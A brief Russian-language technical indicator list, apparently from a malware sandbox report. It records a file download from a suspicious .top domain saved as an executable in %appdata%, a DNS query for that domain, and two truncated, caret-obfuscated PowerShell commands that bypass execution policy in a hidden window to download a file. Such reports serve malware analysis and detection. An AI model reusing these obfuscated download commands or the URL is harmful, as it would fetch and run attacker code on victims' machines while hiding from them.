Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^E^RsHELL^.E^X^E^ -^ExECuTIonpOL^IC^y^ B^Y^paSS -^nOP^RO^fI^LE -^WI^nd^o^wst^y^lE hIDDe^n^ ^(^n^E^W^-^o^b^j^ecT^ ^s^Y^StEm^.^NET.^W^ebCl^iENt)^.D^O^WN^loAdfI^Le^('http://sutr...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "POw^E^RsHELL^.E^X^E^ -^ExECuTIonpOL^IC^y^ B^Y^paSS -^nOP^RO^fI^LE -^WI^nd^o^wst^y^lE hIDDe^n^ ^(^n^E^W^-^o^b^j^ecT^ ^s^Y^StEm^.^NET.^W^ebCl^iENt)^.D^O^WN^loAdfI^Le^('http://sutr...' (со скрытым окном)